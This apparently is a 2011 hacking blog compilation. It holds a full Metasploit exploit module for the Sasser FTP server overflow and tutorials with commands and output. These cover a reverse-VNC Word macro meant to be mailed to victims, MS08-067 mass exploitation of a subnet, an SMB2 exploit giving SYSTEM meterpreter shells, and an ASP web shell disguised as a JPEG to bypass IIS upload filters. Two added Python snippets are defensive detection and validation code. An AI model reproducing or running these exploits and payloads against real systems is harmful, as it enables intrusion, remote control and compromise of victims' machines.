Saturday, August 20, 2011

Sasser FTPd - Remote exploit for the FTP server

By Attack Research

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::sasser_ftpd;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };
my $info =
  {
    'Name'     => 'sasser worm avserve FTP server Overflow',
    'Version'  => '$Revision: 1 $',
    'Authors'  =>
      [
        'valsmith [at] metasploit.net',
        'chamuco [at] gmail.com',
      ],

    'Arch'     => [ 'x86' ],
    'OS'       => [ 'win32', 'winxp' ],
    'Priv'     => 0,

    'AutoOpts' => { 'EXITFUNC' => 'thread' },
    'UserOpts' =>
      {
        'RHOST' => [1, 'ADDR', 'The target address'],
        'RPORT' => [1, 'PORT', 'The target port', 21],
        'SSL'   => [0, 'BOOL', 'Use SSL'],
        'USER'  => [1, 'DATA', 'Username', 'ftp'],
        'PASS'  => [1, 'DATA', 'Password', 'ftp'],
      },

    'Payload' =>
      {
        'Space'    => 480,
        'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
        'Prepend'  => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
        'Keys'     => ['+ws2ord'],
      },

    'Description' => Pex::Text::Freeform(qq{
        Windows sasser worm avserve ftp server exploit.
    }),

    'Refs' =>
      [
        ['OSVDB', '6197'],
      ],

    'DefaultTarget' => 0,
    'Targets' =>
      [
        # [ target name, return address ]
        ['Windows XP SP1', 0x77e7633a ],
      ],

    'Keys' => ['ftp'],

    'DisclosureDate' => 'not applicable',
  };

sub new {
  my $class = shift;
  my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  return($self);
}

# Fingerprint the service from its greeting: the avserve FTP server that the
# worm installs identifies itself with a version string matching /5\.0\.3/.
sub Check {
  my ($self) = @_;
  my $target_host = $self->GetVar('RHOST');
  my $target_port = $self->GetVar('RPORT');

  my $s = Msf::Socket::Tcp->new
    (
      'PeerAddr'  => $target_host,
      'PeerPort'  => $target_port,
      'LocalPort' => $self->GetVar('CPORT'),
      'SSL'       => $self->GetVar('SSL'),
    );

  if ($s->IsError) {
    $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
    return $self->CheckCode('Connect');
  }

  my $res = $s->Recv(-1, 20);
  $s->Close();

  if ($res !~ /5\.0\.3/) {
    $self->PrintLine("[*] This server does not appear to be vulnerable.");
    return $self->CheckCode('Safe');
  }

  $self->PrintLine("[*] Vulnerable installation detected.");
  return $self->CheckCode('Detected');
}

sub Exploit {
  my $self = shift;
  my $target_host = $self->GetVar('RHOST');
  my $target_port = $self->GetVar('RPORT');
  my $target_idx  = $self->GetVar('TARGET');
  my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  my $target      = $self->Targets->[$target_idx];

  if (! $self->InitNops(128)) {
    $self->PrintLine("[*] Failed to initialize the NOP module.");
    return;
  }

  # DOS request version
  # my $request = "PORT" . "\x41"x500;

  # The overflow is in the PORT command handler. $target is the
  # [name, address] pair from 'Targets', so the return address is
  # $target->[1], packed as a little-endian dword.
  my $request = "PORT". "\x90"x268 . "\xeb\x06\x90\x90" . pack('V', $target->[1]) .
    "\xe9".pack('V',-1005) . "\x90"x15 . $shellcode . "\x90"x1530;

  my $s = Msf::Socket::Tcp->new
    (
      'PeerAddr'  => $target_host,
      'PeerPort'  => $target_port,
      'LocalPort' => $self->GetVar('CPORT'),
      'SSL'       => $self->GetVar('SSL'),
    );

  if ($s->IsError) {
    $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
    return;
  }

  # Read the greeting, then log in with the configured credentials.
  my $r = $s->RecvLineMulti(20);
  if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
  $self->Print($r);

  $s->Send("USER ".$self->GetVar('USER')."\n");
  $r = $s->RecvLineMulti(10);
  if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
  $self->Print($r);

  $s->Send("PASS ".$self->GetVar('PASS')."\n");
  $r = $s->RecvLineMulti(10);
  if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
  $self->Print($r);

  # Send the oversized PORT command that triggers the overflow.
  $s->Send("$request\n");
  $r = $s->RecvLineMulti(10);
  if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
  $self->Print($r);

  sleep(2);
  return;
}
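As an added, defender-side example (not part of the module above or of Metasploit), the two observables the module relies on can be turned into detection logic for a captured FTP control channel: the "5.0.3" banner fingerprint its Check routine uses, and the oversized, non-numeric PORT argument its Exploit routine sends. The greeting text and the capture are constructed samples; only the "5.0.3" token comes from the module.

```python
import re

SASSER_BANNER_RE = re.compile(r"5\.0\.3")          # same fingerprint as Check
PORT_ARG_RE = re.compile(r"^\d{1,3}(,\d{1,3}){5}$")  # h1,h2,h3,h4,p1,p2
MAX_PORT_ARG_LEN = 23  # len("255,255,255,255,255,255")


def is_sasser_banner(banner: str) -> bool:
    """True when an FTP greeting carries the version string the module checks for."""
    return bool(SASSER_BANNER_RE.search(banner))


def is_malformed_port(line: str) -> bool:
    """Flag a PORT command that is oversized or not a six-octet tuple. The module
    sends PORT followed by ~2,300 bytes of NOP sled, jump, return address and
    payload, so it fails both tests; a legitimate client never exceeds 23 bytes."""
    if line[:4].upper() != "PORT":
        return False
    arg = line[4:].strip()
    return len(arg) > MAX_PORT_ARG_LEN or PORT_ARG_RE.match(arg) is None


def scan_control_channel(lines):
    """Return (line_number, reason) findings over captured control-channel lines."""
    findings = []
    for n, line in enumerate(lines, 1):
        if line.startswith("220") and is_sasser_banner(line):
            findings.append((n, "sasser-avserve-banner"))
        elif is_malformed_port(line):
            findings.append((n, "malformed-port-command"))
    return findings


# Constructed sample capture (not real traffic); the greeting text is hypothetical.
SAMPLE_LINES = [
    "220 Welcome 5.0.3",
    "USER ftp",
    "PASS ftp",
    "PORT 192,168,1,10,4,1",
    "PORT" + "\x90" * 268 + "\xeb\x06\x90\x90" + "AAAA" + "\x90" * 40,
]

if __name__ == "__main__":
    for n, reason in scan_control_channel(SAMPLE_LINES):
        print(f"line {n}: {reason}")
```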

Linux - Remote shell with NetCat

See that:

enjoy!

Metasploit: Reverse VNC hidden in a Word file

Write:

Today I will show you how to use the Metasploit payload feature to get a reverse VNC connection hidden in a Word file, giving you the VNC desktop of the remote user.

Metasploit creates a macro for Word; once a user opens the Word file containing the macro, we get a reverse VNC session to the target system, and even antivirus can't detect it.

VNC does not need to be installed on the victim PC.
You can also do this over the WAN; the only requirement is that you forward port 4444 on your modem or router.

Let's begin

1) Create a macro to integrate with Word

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.147.128 V > /tmp/punter.bas

2) Copy the punter.bas file to Windows, then open Office 2003 -> Tools -> Macro -> Visual Basic Editor.
Go to File -> Import File, choose punter.bas and save the document under a name such as macrogame.doc.
Now send this file to the victim by mail or some other technique; for this demo I will open it on my own system.

3) Now in BackTrack type this command

./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.147.128 DisableCourtesyShell=True E

When the target opens the file on Windows, they are asked whether to run the macro; if they accept, the connection is initiated and the VNC client opens on the BackTrack host.

Video link for the above guide

http://blip.tv/file/1847504

http://wirelesspunter.blip.tv

Hacking Malware [Video Tut]

http://good.net/dl/bd/defcon-14-video/Defcon14-V12-Valsmith_and_Quist-Hacking_Malware.mp4/info

Metasploit Mass Exploitation for Dummies

Write:

One of the features added in the 3.2 release of the Metasploit Framework was the ability to restrict the db_autopwn command to specific ports and modules matching a given regular expression. This feature can be used to run one or more exploits against a specific range of hosts at the same time.

In the example below, we will demonstrate how to launch the MS08-067 exploit against every host with port 445 open in a specific class C.

To get started, run msfconsole on a Linux machine running a recent Subversion snapshot of the Metasploit Framework (3.3-dev; although 3.2 will work as well), the sqlite3 Ruby gem, and a recent version of Nmap. Once the Metasploit prompt appears, use the load command to load the SQLite3 driver.


msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3


Next we will use the db_create command to initialize a new SQLite3 database and connect it to the Metasploit Framework instance:


msf > db_create
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db


To speed up our test, we will use the db_nmap command with a very narrow set of search requirements. In this case, we want to find every machine with port 445 open on the target subnet. One of the quickest ways to accomplish this is the flag combination below:


msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24


Finally, we execute the db_autopwn command, with the -e option to specify exploitation, the -p option to specify port-based matching, the -b option to select the bindshell payload, and the -m option to only run modules with the string "ms08_067" in their name:


msf > db_autopwn -e -p -b -m ms08_067


Once this command completes, we can use the sessions -l command to list the active shells. Use the sessions -i [SID] command to interact with a given session.


msf > sessions -l
Active sessions
===============

Id  Description    Tunnel
--  -----------    ------
1   Command shell  AAA.BBB.CCC.11 -> AAA.BBB.CCC.86

msf > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


Enjoy!

Hack Windows Vista with Metasploit

Write:

msf> use auxiliary/scanner/smb/smb2
msf (auxiliary/smb2) > set RHOSTS 192.168.0.0/24
msf (auxiliary/smb2) > set THREADS 100
msf (auxiliary/smb2) > run

[*] 192.168.0.142 supports SMB 2 [dialect 2.2] and has been online for 54 hours
[*] 192.168.0.211 supports SMB 2 [dialect 2.2] and has been online for 53 hours

When using Metasploit on Windows XP, socket restrictions prevent scanners from working at their full speed. We recommend using anything but XP (2000, Vista, 7) if you need to use the scanning modules inside Metasploit on Windows. Alternatively, boot the BackTrack4 Virtual Machine in VMWare.

Now that we have identified two systems with SMB2 enabled, it's exploit time!

msf> use exploit/windows/smb/smb2_negotiate_func_index
msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (exploit/smb2) > set LHOST 192.168.0.136
msf (exploit/smb2) > set LPORT 5678
msf (exploit/smb2) > set RHOST 192.168.0.211
msf (exploit/smb2) > exploit

[*] Started reverse handler
[*] Connecting to the target (192.168.0.211:445)...
[*] Sending the exploit packet (854 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)

meterpreter > sysinfo
Computer: WIN-UAKGQGDWLX2
OS : Windows 2008 (Build 6001, Service Pack 1).
Arch : x86
Language: en_US

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Voila! A great way to justify disabling SMB2 across your network.

Next item of interest -- we are now generating hourly builds of the 3.3-dev tree and making these available for download from the Metasploit web site. These come in two flavors and two sizes. We are offering the 3.3-dev package for Unix systems in both Full and Mini versions. The Mini version removes the SVN directories, many of the development source files, and the msfweb/msfgui interfaces.

For the first time, we are offering 3.3-dev packages for Windows (based on Cygwin 1.7 [HEAD]), also in Full and Mini versions. The Windows installer is lightweight and can be installed alongside an existing version of Metasploit. The Windows version can be installed to a USB key and made portable, just by specifying the proper path during the install. Finally, the Windows installer can be made to run in batch mode with a command line like the following:

C:\> framework-3.3-dev-mini.exe /S /D=C:\metasploit33dev

We would like to make sure everyone is aware of the freely-available Metasploit Unleashed Online Course developed by the Offensive Security team. The Metasploit Project is currently working with the team to expand the breadth and depth of this online course, with help from our own official Metasploit courseware. This course should continue to improve at rapid rate over the next few months.

Exploiting Microsoft IIS with Metasploit

Write:

First we generate an ASP script that does a Meterpreter connect-back to the system running Metasploit:

$ msfpayload windows/meterpreter/reverse_tcp \
LHOST=1.2.3.4 LPORT=8443 R | \
msfencode -o evil.asp

Now we need to configure msfconsole to accept the incoming connection:

$ msfconsole
msf> use exploit/multi/handler
msf (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (handler) > set LHOST 1.2.3.4
msf (handler) > set LPORT 8443
msf (handler) > set ExitOnSession false
msf (handler) > exploit -j

To avoid the image content validator, we will prepend a valid JPG image to our ASP script:

$ cat happy.jpg evil.asp > "evil.asp;.jpg"

$ file "evil.asp;.jpg"
JPEG image data, JFIF standard 1.02

Now we upload our "evil.asp;.jpg" image to the web application. Since the extension ends in "jpg" and the contents of the file appear to be a valid JPEG, the web application accepts the file and renames it to "/images/evil.asp;.jpg".

Finally, we browse to the URL of the uploaded ASP/JPG, which will execute our payload and create a new session with the msfconsole:

[*] Starting the payload handler...
[*] Started reverse handler on port 8443
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.xxx:8443 -> 66.234.xx.xx:1186)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2668 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami

nt authority\network service
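As an added example from the defender's side (not code from the original post), here is the upload check the post defeats next to a hardened one: the weak check looks only at the trailing extension and the image magic, which "evil.asp;.jpg" with a JPEG prepended satisfies, while the hardened check validates the whole client-supplied name and stores the file under a server-chosen name. The sample file contents are constructed; the function and regex names are mine.

```python
import re
import secrets

JPEG_MAGIC = b"\xff\xd8\xff"
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
# Whole-name whitelist: one base name, one dot, one image extension. It rejects
# ';', '/', '\\', NUL, spaces and extra dots, so "evil.asp;.jpg" cannot pass.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(jpg|jpeg|png|gif)$")


def weak_accepts(filename: str, content: bytes) -> bool:
    """The check the post defeats: only the last extension and the image magic.
    A JPEG with ASP appended satisfies both, and IIS 6 stops parsing the
    stored name at ';' and runs it as evil.asp."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in ALLOWED_EXT and content.startswith(JPEG_MAGIC)


def hardened_accepts(filename: str, content: bytes) -> bool:
    """Validate the entire client-supplied name against the whitelist and still
    require the image magic (magic alone never rules out a polyglot)."""
    return SAFE_NAME_RE.match(filename) is not None and content.startswith(JPEG_MAGIC)


def stored_name(filename: str) -> str:
    """Never keep the client name on disk: use a random server-chosen name with
    the validated extension, so nothing in the request influences the path."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(8)}.{ext}"


# Constructed samples (not real files): a minimal JPEG header, and the same
# header with inert script text appended, mirroring "cat happy.jpg evil.asp".
FAKE_JPEG = JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00\x01\x02" + b"\x00" * 16
POLYGLOT = FAKE_JPEG + b"<% 'script text would go here %>"

if __name__ == "__main__":
    for name in ("happy.jpg", "evil.asp;.jpg", "evil.asp", "..\\web.config.jpg"):
        print(f"{name:20} weak={weak_accepts(name, POLYGLOT)} "
              f"hardened={hardened_accepts(name, POLYGLOT)}")
```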